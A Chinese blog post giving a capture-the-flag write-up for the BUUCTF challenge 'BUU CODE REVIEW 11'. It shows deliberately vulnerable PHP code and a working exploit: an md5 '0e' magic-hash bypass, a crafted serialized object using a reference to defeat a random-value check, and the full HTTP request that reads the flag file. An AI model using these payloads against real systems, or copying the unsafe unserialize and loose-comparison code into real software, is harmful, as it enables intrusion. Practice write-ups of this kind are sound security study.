BUU CODE REVIEW 11

传送门
先观察代码

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/10/6
 * Time: 8:04 PM
 */

highlight_file(__FILE__);

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') {
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

我们发现接触这道题需要以下步骤:

1.通过GET与POST请求将pleaseget&pleasepost上传对应的值

我们只需要插入?pleaseget=1即可完成第一步
然后通过将GET请求改为POST请求即可上传pleasepost

2.md5绕过

因为在php中 0e开头的字符串会被认为是0,便可以用md5值为0e开头的数来绕过md5

3.反序列化与序列化

分析代码可以知道,我们需要将obj赋值为BUU类的序列化,然后便会执行函数

点击查看代码 
public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
但是在函数内部还有一次判断,因为生成的correct是纯随机的,我们无法通过预测进行绕过,但是我们可以将correct的地址赋给input,那么不管correct怎么变,input都相同 生成序列化字段代码为 
<?php
class BUU {
        public $correct = "";
        public $input = "";
     }
$fff = new BUU( );
$fff -> input = &$fff -> correct;
echo serialize($fff);
?>

结果为O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

最终请求头:

POST /?pleaseget=1 HTTP/1.1
Host: 7c70169c-99eb-438e-a98d-1b1424d076ee.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-GPC: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

pleasepost=2&md51=QNKCDZO&md52=240610708&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
posted @ 2025-05-13 18:43  Mikasa_Ackerman  阅读(6)  评论(0)    收藏  举报